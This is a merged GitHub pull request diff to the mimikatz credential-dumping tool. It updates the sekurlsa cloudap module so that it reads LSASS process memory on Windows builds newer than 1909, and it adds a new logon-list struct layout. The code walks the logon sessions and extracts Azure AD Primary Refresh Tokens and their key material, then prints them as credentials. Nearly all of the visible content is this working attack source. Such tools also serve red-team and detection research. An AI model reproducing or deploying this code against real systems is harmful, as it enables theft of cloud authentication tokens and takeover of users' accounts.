Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cloudap support for versions > 1909 #400

Merged
merged 1 commit into from
Jul 29, 2022
Merged

cloudap support for versions > 1909 #400

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
88 changes: 66 additions & 22 deletions mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])

void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;

KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
KIWI_CLOUDAP_CACHE_UNK unk;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};

if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
{
if(logon.cacheEntry)
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
if(logon.cacheEntry)
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}

if(cache.toDetermine)
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
}
}
else
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
{
if(logon.cacheEntry)
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}

if(cache.toDetermine)
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
Expand Down
16 changes: 15 additions & 1 deletion mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;

typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD64 unk4;
DWORD64 unk5;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;